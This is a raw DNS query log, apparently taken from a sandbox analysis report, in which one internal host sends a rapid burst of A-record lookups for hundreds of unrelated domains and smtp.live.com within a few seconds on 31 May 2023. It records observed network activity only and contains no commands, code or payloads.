                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.350163937 CEST192.168.2.38.8.8.80x17edStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.363647938 CEST192.168.2.38.8.8.80x1d47Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.386315107 CEST192.168.2.38.8.8.80x5381Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.428220987 CEST192.168.2.38.8.8.80xc873Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.431441069 CEST192.168.2.38.8.8.80x521Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.442367077 CEST192.168.2.38.8.8.80xed43Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.445049047 CEST192.168.2.38.8.8.80x1ac9Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.467745066 CEST192.168.2.38.8.8.80x465bStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.492048025 CEST192.168.2.38.8.8.80x21d3Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.526180983 CEST192.168.2.38.8.8.80xc286Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.527889013 CEST192.168.2.38.8.8.80x4f59Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.530091047 CEST192.168.2.38.8.8.80x911eStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.543504953 CEST192.168.2.38.8.8.80xc8b5Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.551027060 CEST192.168.2.38.8.8.80x60ebStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.563503981 CEST192.168.2.38.8.8.80x585Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.649663925 CEST192.168.2.38.8.8.80x40f9Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.673427105 CEST192.168.2.38.8.8.80x9a2cStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.674233913 CEST192.168.2.38.8.8.80x15e1Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.688024044 CEST192.168.2.38.8.8.80x9817Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.728329897 CEST192.168.2.38.8.8.80xaa0eStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.899264097 CEST192.168.2.38.8.8.80xe64bStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.922395945 CEST192.168.2.38.8.8.80x548bStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.928807020 CEST192.168.2.38.8.8.80xea7Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.998322010 CEST192.168.2.38.8.8.80xc849Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.006932974 CEST192.168.2.38.8.8.80x3756Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.027121067 CEST192.168.2.38.8.8.80x8f2aStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.034030914 CEST192.168.2.38.8.8.80xb849Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.058434963 CEST192.168.2.38.8.8.80xe8f3Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.083547115 CEST192.168.2.38.8.8.80xdba9Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.099299908 CEST192.168.2.38.8.8.80xfb96Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.137399912 CEST192.168.2.38.8.8.80x511Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.175913095 CEST192.168.2.38.8.8.80x2c7fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.207300901 CEST192.168.2.38.8.8.80xd062Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.212305069 CEST192.168.2.38.8.8.80x835Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.238987923 CEST192.168.2.38.8.8.80x2105Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.254190922 CEST192.168.2.38.8.8.80x8165Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.266326904 CEST192.168.2.38.8.8.80x7239Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.275773048 CEST192.168.2.38.8.8.80x7a85Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.295536995 CEST192.168.2.38.8.8.80xaa94Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.299669981 CEST192.168.2.38.8.8.80xb629Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.323517084 CEST192.168.2.38.8.8.80xef42Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.338591099 CEST192.168.2.38.8.8.80x4300Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.396869898 CEST192.168.2.38.8.8.80xeecfStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.443255901 CEST192.168.2.38.8.8.80xd6baStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.474699974 CEST192.168.2.38.8.8.80x2725Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.484000921 CEST192.168.2.38.8.8.80xc801Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.487005949 CEST192.168.2.38.8.8.80x3ae3Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.493736029 CEST192.168.2.38.8.8.80xfc03Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.518110037 CEST192.168.2.38.8.8.80xf67bStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.521198988 CEST192.168.2.38.8.8.80xb1c1Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.548163891 CEST192.168.2.38.8.8.80x911eStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.550880909 CEST192.168.2.38.8.8.80xf62aStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.570076942 CEST192.168.2.38.8.8.80xa689Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.593157053 CEST192.168.2.38.8.8.80x32d2Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.594472885 CEST192.168.2.38.8.8.80x9d31Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.603636980 CEST192.168.2.38.8.8.80xa715Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.639022112 CEST192.168.2.38.8.8.80xbce1Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.701750040 CEST192.168.2.38.8.8.80x9817Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.725636959 CEST192.168.2.38.8.8.80x93Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.744584084 CEST192.168.2.38.8.8.80x9fa3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.752726078 CEST192.168.2.38.8.8.80x439Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.787342072 CEST192.168.2.38.8.8.80x1f3Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.813380957 CEST192.168.2.38.8.8.80xd598Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.851244926 CEST192.168.2.38.8.8.80x8940Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.880834103 CEST192.168.2.38.8.8.80x2085Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.881963015 CEST192.168.2.38.8.8.80x9676Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.890332937 CEST192.168.2.38.8.8.80xf003Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.906205893 CEST192.168.2.38.8.8.80xfd5eStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.983048916 CEST192.168.2.38.8.8.80x28afStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.009732962 CEST192.168.2.38.8.8.80xa229Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.024869919 CEST192.168.2.38.8.8.80x4dfStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.067672014 CEST192.168.2.38.8.8.80x157bStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.090743065 CEST192.168.2.38.8.8.80xc069Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.117104053 CEST192.168.2.38.8.8.80xcb0bStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.156323910 CEST192.168.2.38.8.8.80x7fddStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.161832094 CEST192.168.2.38.8.8.80x1418Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.217442989 CEST192.168.2.38.8.8.80x7dc9Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.225663900 CEST192.168.2.38.8.8.80x111bStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.225663900 CEST192.168.2.38.8.8.80xcc09Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.264914036 CEST192.168.2.38.8.8.80xed36Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.307660103 CEST192.168.2.38.8.8.80x633bStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.342252970 CEST192.168.2.38.8.8.80x1fd7Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.352993011 CEST192.168.2.38.8.8.80x5f59Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.376709938 CEST192.168.2.38.8.8.80xca6fStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.376709938 CEST192.168.2.38.8.8.80x8cfbStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.376933098 CEST192.168.2.38.8.8.80x90f2Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.376933098 CEST192.168.2.38.8.8.80x46cbStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.377038956 CEST192.168.2.38.8.8.80xcf18Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.377518892 CEST192.168.2.38.8.8.80x224aStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.377518892 CEST192.168.2.38.8.8.80x2c85Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.386538982 CEST192.168.2.38.8.8.80x43dfStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.399147034 CEST192.168.2.38.8.8.80x24c4Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.463738918 CEST192.168.2.38.8.8.80x63ddStandard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.491590023 CEST192.168.2.38.8.8.80x25a1Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.500122070 CEST192.168.2.38.8.8.80x3897Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.500122070 CEST192.168.2.38.8.8.80x9768Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.595098019 CEST192.168.2.38.8.8.80xa715Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.599668026 CEST192.168.2.38.8.8.80xbb02Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.627780914 CEST192.168.2.38.8.8.80xab7dStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.650832891 CEST192.168.2.38.8.8.80x3bb9Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.702686071 CEST192.168.2.38.8.8.80x9817Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.745667934 CEST192.168.2.38.8.8.80x62f8Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.752877951 CEST192.168.2.38.8.8.80xcf9aStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.920481920 CEST192.168.2.38.8.8.80xf003Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.986381054 CEST192.168.2.38.8.8.80xd1a4Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.999517918 CEST192.168.2.38.8.8.80x3353Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.011455059 CEST192.168.2.38.8.8.80x4a09Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.013917923 CEST192.168.2.38.8.8.80x1363Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.046183109 CEST192.168.2.38.8.8.80xa050Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.093596935 CEST192.168.2.38.8.8.80xbfa3Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.328986883 CEST192.168.2.38.8.8.80xe498Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.414259911 CEST192.168.2.38.8.8.80x717eStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.608675003 CEST192.168.2.38.8.8.80xa715Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.647238016 CEST192.168.2.38.8.8.80xc323Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.770323992 CEST192.168.2.38.8.8.80xe70bStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.879527092 CEST192.168.2.38.8.8.80x1a2dStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.920891047 CEST192.168.2.38.8.8.80xf003Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.944619894 CEST192.168.2.38.8.8.80x6f6fStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.972716093 CEST192.168.2.38.8.8.80x43c0Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.098887920 CEST192.168.2.38.8.8.80x9f0fStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.136641979 CEST192.168.2.38.8.8.80x255aStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.188291073 CEST192.168.2.38.8.8.80x2f24Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.256704092 CEST192.168.2.38.8.8.80xe9edStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.284805059 CEST192.168.2.38.8.8.80xcdd5Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.285337925 CEST192.168.2.38.8.8.80xd1a1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.315965891 CEST192.168.2.38.8.8.80x33d2Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.339072943 CEST192.168.2.38.8.8.80xf5daStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.339073896 CEST192.168.2.38.8.8.80xf522Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.406497955 CEST192.168.2.38.8.8.80x787fStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.424901962 CEST192.168.2.38.8.8.80x6e0aStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.437576056 CEST192.168.2.38.8.8.80x8ff1Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.625256062 CEST192.168.2.38.8.8.80xa167Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.667952061 CEST192.168.2.38.8.8.80x65ddStandard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.701802015 CEST192.168.2.38.8.8.80x9817Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.784312010 CEST192.168.2.38.8.8.80xb9b1Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.110017061 CEST192.168.2.38.8.8.80x414cStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.234396935 CEST192.168.2.38.8.8.80xb3dcStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.266449928 CEST192.168.2.38.8.8.80x9e9bStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.271966934 CEST192.168.2.38.8.8.80x7806Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.281640053 CEST192.168.2.38.8.8.80x868cStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.296760082 CEST192.168.2.38.8.8.80xd1a1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.333214998 CEST192.168.2.38.8.8.80xae62Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.356832981 CEST192.168.2.38.8.8.80xccc2Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.380189896 CEST192.168.2.38.8.8.80x70bStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.387823105 CEST192.168.2.38.8.8.80xc95bStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.489731073 CEST192.168.2.38.8.8.80xa64cStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.505935907 CEST192.168.2.38.8.8.80x4428Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.619457960 CEST192.168.2.38.8.8.80x968cStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.679080963 CEST192.168.2.38.8.8.80x21a7Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.691308975 CEST192.168.2.38.8.8.80x6adfStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.771289110 CEST192.168.2.38.8.8.80x1656Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.874857903 CEST192.168.2.38.8.8.80xe494Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.970714092 CEST192.168.2.38.8.8.80x4814Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.970771074 CEST192.168.2.38.8.8.80x1fbcStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.971024990 CEST192.168.2.38.8.8.80xdf11Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.971105099 CEST192.168.2.38.8.8.80x691dStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.971237898 CEST192.168.2.38.8.8.80x606eStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.971395969 CEST192.168.2.38.8.8.80x9360Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.078715086 CEST192.168.2.38.8.8.80xa797Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.094883919 CEST192.168.2.38.8.8.80xf1c1Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.095741034 CEST192.168.2.38.8.8.80x3210Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.095825911 CEST192.168.2.38.8.8.80x22bfStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.096084118 CEST192.168.2.38.8.8.80x516cStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.096155882 CEST192.168.2.38.8.8.80x7644Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.126245975 CEST192.168.2.38.8.8.80xe0c3Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.175750971 CEST192.168.2.38.8.8.80x1e49Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.283770084 CEST192.168.2.38.8.8.80x230dStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.290668011 CEST192.168.2.38.8.8.80x23c0Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.313951969 CEST192.168.2.38.8.8.80xd1a1Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.316540956 CEST192.168.2.38.8.8.80xd0a6Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.371957064 CEST192.168.2.38.8.8.80x19f4Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.609476089 CEST192.168.2.38.8.8.80xcceaStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.676373959 CEST192.168.2.38.8.8.80xe4c2Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.692127943 CEST192.168.2.38.8.8.80xcf8eStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.844542027 CEST192.168.2.38.8.8.80x1ee0Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.987102985 CEST192.168.2.38.8.8.80xddb1Standard query (0)ssm.chA (IP address)IN (0x0001)false
